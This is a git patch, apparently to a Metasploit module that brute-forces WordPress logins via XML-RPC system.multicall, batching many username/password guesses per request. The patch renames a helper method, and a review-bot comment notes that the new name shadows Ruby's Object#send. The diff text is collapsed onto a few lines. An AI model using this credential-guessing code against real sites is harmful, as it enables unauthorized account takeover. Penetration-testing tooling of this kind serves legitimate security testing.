From 732563614b5044048d69db6a9e2e22b03ffa556a Mon Sep 17 00:00:00 2001
From: KINGSABRI
Date: Thu, 12 Nov 2015 20:26:17 +0300
Subject: [PATCH] Change connecting method to send for better code naming
---
 .../wordpress_xmlrpc_massive_bruteforce.rb | 88 +++++++++----------
 1 file changed, 44 insertions(+), 44 deletions(-)
diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
index 067cce048a..f4e4c31458 100644
--- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
+++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_massive_bruteforce.rb
@@ -16,26 +16,26 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{Wordpress Massive Burteforce attacks via wordpress XMLRPC service.}, 'License' => MSF_LICENSE, 'Author' => - [ - 'Sabri (@KINGSABRI)', # Module Writer - 'William (WCoppola@Lares.com)' # Module Requester - ], + [ + 'Sabri (@KINGSABRI)', # Module Writer + 'William (WCoppola@Lares.com)' # Module Requester + ], 'References' => - [ - ['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/'], - ['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html'] - ] + [ + ['URL', 'https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/'], + ['URL', 'https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html'] + ] )) register_options( - [ - OptString.new('TARGETURI', [true, 'The base path', '/']), - OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line', - File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]), - OptPath.new('WPPASS_FILE', [true, 'File containing passwords, one per line', - File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")]), - OptInt.new('BLOCKEDWAIT', [true, 'Time(minutes) to wait if got blocked', 6]) - ], self.class) + [ + OptString.new('TARGETURI', [true, 'The base path', '/']), + OptPath.new('WPUSER_FILE', [true, 'File containing usernames, one per line', + File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]), + OptPath.new('WPPASS_FILE', [true, 'File containing passwords, one per line', + File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt")]), + OptInt.new('BLOCKEDWAIT', [true, 'Time(minutes) to wait if got blocked', 6]) + ], self.class) end def usernames 
@@ -60,31 +60,31 @@ class Metasploit3 < Msf::Auxiliary xml.methodCall { xml.methodName("system.multicall") xml.params { - xml.param { - xml.value { - xml.array { - xml.data { + xml.param { + xml.value { + xml.array { + xml.data { - pass_group.each do |pass| - xml.value { - xml.struct { - xml.member { - xml.name("methodName") - xml.value { xml.string("wp.getUsersBlogs") }} - xml.member { - xml.name("params") - xml.value { - xml.array { - xml.data { - xml.value { - xml.array { - xml.data { - xml.value { xml.string(user) } - xml.value { xml.string(pass) } - }}}}}}}}} - end + pass_group.each do |pass| + xml.value { + xml.struct { + xml.member { + xml.name("methodName") + xml.value { xml.string("wp.getUsersBlogs") }} + xml.member { + xml.name("params") + xml.value { + xml.array { + xml.data { + xml.value { + xml.array { + xml.data { + xml.value { xml.string(user) } + xml.value { xml.string(pass) } + }}}}}}}}} + end - }}}}}} + }}}}}} end xml_payloads << document.to_xml @@ -116,8 +116,8 @@ class Metasploit3 < Msf::Auxiliary # # Connection Setup # - def connecting(xml) - uri = target_uri.path + def send(xml) + uri = target_uri.path opts = { 'method' => 'POST', @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary generate_xml(user).each do |xml| next if passfound == true - connecting(xml) + send(xml) # Request Parser req_xml = Nokogiri::Slop xml @@ -174,5 +174,5 @@ class Metasploit3 < Msf::Auxiliary sleep 2 end - end end end -end + end end end +end \ No newline at end of file
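Review bot: Naming the helper `send` in the `@@ -116,8 +116,8 @@` hunk overrides Ruby's core `Object#send` on every instance of this module class. Any code that dispatches dynamically on the module object, such as `mod.send(:some_method, args)`, would then reach this one-argument HTTP helper instead, and would either raise an `ArgumentError` or post a symbol as the request body. A non-colliding name keeps the intent of the rename: `def send_xml_request(xml)`, with the call in the `@@ -148,7 +148,7 @@` hunk changed to `send_xml_request(xml)`. The method body continues outside the hunk, so how the response is handed back to the caller cannot be confirmed from the visible lines.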